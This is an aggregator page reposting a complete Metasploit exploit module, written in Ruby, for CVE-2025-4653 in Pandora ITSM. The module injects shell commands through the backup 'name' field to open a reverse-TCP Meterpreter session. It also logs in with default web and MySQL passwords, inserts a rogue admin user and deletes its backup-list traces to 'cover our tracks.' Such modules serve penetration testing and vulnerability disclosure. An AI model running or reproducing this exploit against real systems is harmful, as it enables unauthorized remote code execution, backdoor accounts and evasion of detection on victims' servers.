惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

雷峰网
雷峰网
宝玉的分享
宝玉的分享
I
InfoQ
P
Privacy International News Feed
V
V2EX
IT之家
IT之家
S
SegmentFault 最新的问题
D
Darknet – Hacking Tools, Hacker News & Cyber Security
V2EX - 技术
V2EX - 技术
C
CERT Recently Published Vulnerability Notes
C
Check Point Blog
The Register - Security
The Register - Security
爱范儿
爱范儿
博客园 - 三生石上(FineUI控件)
AWS News Blog
AWS News Blog
M
MIT News - Artificial intelligence
C
Cyber Attacks, Cyber Crime and Cyber Security
F
Fortinet All Blogs
B
Blog
N
Netflix TechBlog - Medium
B
Blog RSS Feed
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Last Week in AI
Last Week in AI
T
Threatpost
Forbes - Security
Forbes - Security
U
Unit 42
A
Arctic Wolf
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
P
Palo Alto Networks Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Recorded Future
Recorded Future
L
Lohrmann on Cybersecurity
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
P
Proofpoint News Feed
月光博客
月光博客
Spread Privacy
Spread Privacy
MongoDB | Blog
MongoDB | Blog
Jina AI
Jina AI
I
Intezer
V
Visual Studio Blog
阮一峰的网络日志
阮一峰的网络日志
The Hacker News
The Hacker News
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
L
LangChain Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园_首页
MyScale Blog
MyScale Blog
腾讯CDC
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
量子位

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Pandora ITSM Authenticated Command Injection
2025-08-10 · via The Exploit Database - CXSecurity.com

Pandora ITSM Authenticated Command Injection

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/mysql/client' require 'digest/md5' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include BCrypt include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck # @!attribute [rw] mysql_client # @return [::Rex::Proto::MySQL::Client] attr_accessor :mysql_client def initialize(info = {}) super( update_info( info, 'Name' => 'Pandora ITSM authenticated command injection leading to RCE via the backup function', 'Description' => %q{ Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support and customer service teams, aligned with ITIL processes. This module exploits a command injection vulnerability in the `name` backup setting at the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at the `name` parameter. You need to have admin access at the Pandora ITSM Web application in order to execute this RCE. This access can be achieved by knowing the admin credentials to access the web application or leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access the Pandora FMS ITSM database, create a new admin user and gain administrative access to the Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world. This issue affects all ITSM Enterprise editions up to `5.0.105` and is patched at `5.0.106`. }, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Discovery, Metasploit module & default password weakness ], 'References' => [ ['CVE', '2025-4653'], ['URL', 'https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/'], ['URL', 'https://github.com/h00die-gr3y/h00die-gr3y/security/advisories/GHSA-m4f8-9c8x-8f3f'], ['URL', 'https://attackerkb.com/topics/wgCb1QQm1t/cve-2025-4653'] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Privileged' => false, 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'Unix/Linux Command', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' }, 'Payload' => { 'Encoder' => 'cmd/base64', 'BadChars' => "\x20\x3E\x26\x27\x22" # no space > & ' " } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2025-06-10', 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Path to the Pandora ITSM application', '/pandoraitsm']), OptString.new('DB_USER', [true, 'Pandora database admin user', 'pandoraitsm']), OptString.new('DB_PASSWORD', [true, 'Pandora database admin password', 'P4ndor4.itsm']), OptString.new('DB_NAME', [true, 'Pandora database', 'pandoraitsm']), OptPort.new('DB_PORT', [true, 'MySQL database port', 3306]), OptString.new('USERNAME', [false, 'Pandora web admin user', 'admin']), OptString.new('PASSWORD', [false, 'Pandora web admin password', 'integria']) ]) end # MySQL login # @param [String] host # @param [String] user # @param [String] password # @param [String] db # @param [String] port # @return [TrueClass|FalseClass] true if login successful, else false def mysql_login(host, user, password, db, port) begin self.mysql_client = ::Rex::Proto::MySQL::Client.connect(host, user, password, db, port) rescue Errno::ECONNREFUSED print_error('MySQL connection refused') return false rescue ::Rex::Proto::MySQL::Client::ClientError print_error('MySQL connection timedout') return false rescue Errno::ETIMEDOUT print_error('Operation timedout') return false rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged print_error('Unable to login from this host due to policy') return false rescue ::Rex::Proto::MySQL::Client::AccessDeniedError print_error('MySQL Access denied') return false rescue StandardError => e print_error("Unknown error: #{e.message}") return false end true end # MySQL query # @param [String] sql # @return [query|nil|FalseClass] if sql query successful (can be nil), else false def mysql_query(sql) begin res = mysql_client.query(sql) rescue ::Rex::Proto::MySQL::Client::Error => e print_error("MySQL Error: #{e.class} #{e}") return false rescue Rex::ConnectionTimeout => e print_error("Timeout: #{e.message}") return false rescue StandardError => e print_error("Unknown error: #{e.message}") return false end res end # login at the Pandora ITSM web application # @param [String] name # @param [String] pwd # @return [TrueClass|FalseClass] true if login successful, else false def pandoraitsm_login(name, pwd) res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_post' => { 'login' => 1, 'nick' => name, 'pass' => pwd, 'Login' => 'LOG IN' } }) return false unless res&.code == 200 res.body.include?('godmode') end # CVE-2025-4653: Command Injection leading to RCE via the backup "name" parameter triggered by the backup function def execute_payload(cmd) @rce_payload = ";#{cmd};#" vprint_status("RCE payload: #{@rce_payload}") @clean_payload = true send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'sec' => 'godmode', 'sec2' => 'enterprise/godmode/setup/backup_manager' }, 'vars_post' => { 'name' => @rce_payload.to_s, 'mode' => 1, 'mail' => nil, 'create_backup' => 1, 'create' => 'Do a backup now' } }) end # clean-up the payload entries in the backup list by removing the backup name from the list # it also handles multiple entries (leftovers from previous attacks) def clean_rce_payload(payload) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'sec' => 'godmode', 'sec2' => 'enterprise/godmode/setup/integria_backup' } }) unless res&.code == 200 && res.body.include?(payload.slice(0..4)) # just take the first 5 chars (;echo) as match vprint_status('No payload entries found at the backup list.') return end html = res.get_html_document target_rows = html.css('table.dataTable tbody tr').select do |row| name_backup = row.at_css('td') name_backup && name_backup.text.strip.include?(payload.slice(0..4)) end # Get the backup entry based on the href from <a> tags with an onclick attribute if target_rows.any? backup_entry = target_rows.flat_map do |row| row.css('a[onclick]').map { |a| a['href'] } end else vprint_status('No payload entries found at the backup list.') return end vprint_status(backup_entry.to_s) success = true backup_entry.each do |entry| id_bk_param = entry.match(/id_bk=\d*/) next unless id_bk_param id_bk = id_bk_param[0].split('=') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'sec' => 'godmode', 'sec2' => 'enterprise/godmode/setup/integria_backup', 'offset' => 0, 'remove' => 1, id_bk[0].to_s => id_bk[1].to_s } }) success = false unless res&.code == 200 && !res.body.include?(id_bk_param.to_s) end if success print_good('Payload entries successfully removed from backup list.') else print_warning('Payload entries might not be removed from backup list. Check and try to clean it manually.') end end # try to remove the payload from the backup list to cover our tracks def cleanup super # Disconnect from MySQL server mysql_client.close if mysql_client # check if payload should be cleaned clean_rce_payload(@rce_payload) if @clean_payload end def check # use API v1.0 to check version res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'include', 'api.php'), 'vars_get' => { 'info' => 'version' } }) return CheckCode::Unknown('Received unknown response.') unless res&.code == 200 return CheckCode::Safe('Target is not a Pandora ITSM application.') unless res.body.include?('Pandora ITSM') version = res.body.match(/\d{1,3}\.\d{1,3}\.\d{1,3}/) unless version.nil? version = Rex::Version.new(version) if version < Rex::Version.new('5.0.106') return CheckCode::Appears(res.body.strip.to_s) else return CheckCode::Safe(res.body.strip.to_s) end end CheckCode::Detected('Could not determine the Pandora ITSM version.') end def exploit # check if we can login at the Pandora Web application with the default admin credentials username = datastore['USERNAME'] password = datastore['PASSWORD'] print_status("Trying to log in with admin credentials #{username}:#{password} at the Pandora ITSM Web application.") unless pandoraitsm_login(username, password) # connect to the PostgreSQL DB with default credentials print_status('Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.') mysql_login_res = mysql_login(datastore['RHOSTS'], datastore['DB_USER'], datastore['DB_PASSWORD'], datastore['DB_NAME'], datastore['DB_PORT']) fail_with(Failure::Unreachable, "Unable to connect to the MySQL server on port #{datastore['DB_PORT']}.") unless mysql_login_res # add a new admin user username = Rex::Text.rand_text_alphanumeric(5..8).downcase password = Rex::Text.rand_password # check the password hash algorithm by reading the password hash of the admin user # new pandora versions hashes the password in bcrypt $2*$, Blowfish (Unix) format else it is a plain MD5 hash mysql_query_res = mysql_query("SELECT password FROM tusuario WHERE id_usuario = 'admin';") fail_with(Failure::BadConfig, 'Cannot find admin credentials to determine password hash algorithm.') if mysql_query_res == false || mysql_query_res.size != 1 hash = mysql_query_res.fetch_hash if hash['password'].match(/^\$2.\$/) password_hash = Password.create(password) else password_hash = Digest::MD5.hexdigest(password) end print_status("Creating new admin user with credentials #{username}:#{password} for access at the Pandora ITSM Web application.") mysql_query_res = mysql_query("INSERT INTO tusuario (id_usuario, password, nivel) VALUES (\'#{username}\', \'#{password_hash}\', '1');") fail_with(Failure::BadConfig, "Adding new admin credentials #{username}:#{password} to the database failed.") if mysql_query_res == false # log in with the new admin user credentials at the Pandora ITSM Web application print_status("Trying to log in with new admin credentials #{username}:#{password} at the Pandora ITSM Web application.") fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora ITSM Web application.') unless pandoraitsm_login(username, password) end print_status('Successfully authenticated at the Pandora ITSM Web application.') # storing credentials at the msf database print_status('Saving admin credentials to the msf database.') store_valid_credential(user: username, private: password) print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") execute_payload(payload.encoded) end end



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}